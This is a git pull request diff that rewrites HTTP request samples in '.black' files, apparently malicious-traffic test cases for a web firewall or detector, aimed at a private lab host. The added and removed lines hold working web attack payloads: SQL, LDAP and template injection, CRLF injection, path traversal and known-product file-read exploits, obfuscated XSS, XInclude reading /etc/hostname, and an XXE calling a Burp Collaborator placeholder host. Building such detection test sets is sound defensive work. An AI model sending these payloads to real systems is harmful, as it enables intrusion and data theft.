Merge pull request #26 from xiaomakuaiz/feat-samples

feat: optimize some testcase

testcases/34/b7/572a6ebd86e9664bf33f5aaee155.black

@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /vulnerabilities/xss_r/?name={{43426*%2741827%27}} HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=frames%5B%2F*foo*%2F%27alert%27%2F*bar*%2F%5D%28frames%5B%2F*foo*%2F%27document%27%2F*bar*%2F%5D%5B%27domain%27%5D%29%3B%2F%2F
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close

testcases/38/a9/2862fec989c7d7b2e61ea58b543b.black

@@ -1,4 +1,4 @@
-GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1
+GET /vulnerabilities/sqli/%0D%0AX-Pen-Test%3AeKqNz22M6K HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36

testcases/38/df/260eb82e55c9eea40b5f85eab86d.black

@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /actions/seomatic/meta-container/meta-link-container/?uri={{228*%2798%27}} HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=parent%5B%27%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%27%5D%28parent%5B%27%5Cx64%5Cx6f%5Cx63%5Cx75%5Cx6d%5Cx65%5Cx6e%5Cx74%27%5D%5B%27%5Cx64%5Cx6f%5Cx6d%5Cx61%5Cx69%5Cx6e%27%5D%29%3B%2F%2F
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close

testcases/39/c8/02d0e455150d0f08ee46787354ca.black

@@ -1,4 +1,4 @@
-GET /%2e/WEB-INF/web.xml HTTP/1.1
+GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin HTTP/1.1
 Host: 10.10.3.128
 Pragma: no-cache
 Cache-Control: no-cache

testcases/3f/aa/9095c933141c59546faccf703b75.black

@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /api/products/123%20and%201=1/reviews?page=2&size=10&sort=time HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=a%3D%27constructor%27%3Bb%3D%7B%7D%3Ba.sub.call.call%28b%5Ba%5D.getOwnPropertyDescriptor%28b%5Ba%5D.getPrototypeOf%28a.sub%29%2Ca%29.value%2C0%2C%27alert%281%29%27%29%28%29
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close

testcases/40/9f/a3f8b55ef516ace9ce5b6bd92bb2.black

@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/test HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=globalThis%5B%27ale%27%2B%27rt%27%5D%28globalThis%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%2F%2F
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close

testcases/45/c7/2b314c34e964921340f35ddb048d.black

@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /%2bCSCOT%2b/translation-table?default-language&lang=../&textdomain=/%2bCSCOE%2b/portal_inc.lua&type=mst HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3C%21DOCTYPE+stockCheck+%5B%3C%21ENTITY+%25+xxe+SYSTEM+%22http%3A%2F%2FBURP-COLLABORATOR-SUBDOMAIN%22%3E+%25xxe%3B+%5D%3E
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close

testcases/46/91/c0fc989e4cf0766cf35af2f22c1a.black

@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /?paramd6f70e=admin%2A%29%28%28%7Cuserpassword=%2A%29 HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=frames%5B%27%5Cx65%5Cx76%5Cx61%5Cx6c%27%5D%28%27frames%5B%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22%5D%28frames%5B%22%5Cx61%5Cx74%5Cx6f%5Cx62%22%5D%28%22WFNT%22%29%29%27%29%3B%2F%2F
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close

testcases/47/0b/90f8073eb0c860827befd43c8bd9.black

@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /?param25f07d=%2A%29%28uid=%2A%29%29%28%7C%28uid=%2A HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=globalThis%5B%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%28%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%29%3B%2F%2F
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close

testcases/47/e8/60f3f244ef8fb130a8e7fe597184.black

@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /uploadfiles/apache.php.jpeg HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3Cfoo+xmlns%3Axi%3D%22http%3A%2F%2Fwww.w3.org%2F2001%2FXInclude%22%3E%3Cxi%3Ainclude+parse%3D%22text%22+href%3D%22file%3A%2F%2F%2Fetc%2Fhostname%22%2F%3E%3C%2Ffoo%3E
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close

testcases/49/e6/139ab3f16b618041e5a61f513c61.black

@@ -1,4 +1,4 @@
-GET /pages/createpage.action?spaceKey=EX&src=quick-create&queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027 HTTP/1.1
+GET /admin/?a=doSearchParameter&appno=0+union+select+43512*43017,1--+&c=language_general&editor=cn&n=language&site=admin&word=search HTTP/1.1
 Host: 10.10.3.128
 Pragma: no-cache
 Cache-Control: no-cache

testcases/4a/16/3e3624055a6de89cc8ea750df30a.black

@@ -1,9 +1,8 @@
-GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1
+GET /SAAS/t/_/;/WEB-INF/web.xml HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/sqli/?id=SELECT+CASE+WHEN+%28YOUR-CONDITION-HERE%29+THEN+1%2F0+ELSE+NULL+END&Submit=Submit
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close

testcases/4b/0a/096825fe5d589a0fe75c44aca53e.black

@@ -1,9 +1,8 @@
-GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1
+GET /mailsms/s?func=ADMIN:appState&dumpConfig=/ HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/sqli/?id=SELECT+CASE+WHEN+%28YOUR-CONDITION-HERE%29+THEN+TO_CHAR%281%2F0%29+ELSE+NULL+END+FROM+dual&Submit=Submit
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close

testcases/4c/17/7df1958bcdf0ea105e4d1f3bcf99.black

@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /admin/?a=doSearchParameter&appno=0+union+select+43512*43017,1--+&c=language_general&editor=cn&n=language&site=admin&word=search HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=frames%5B%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%28%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%29%3B%2F%2F
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close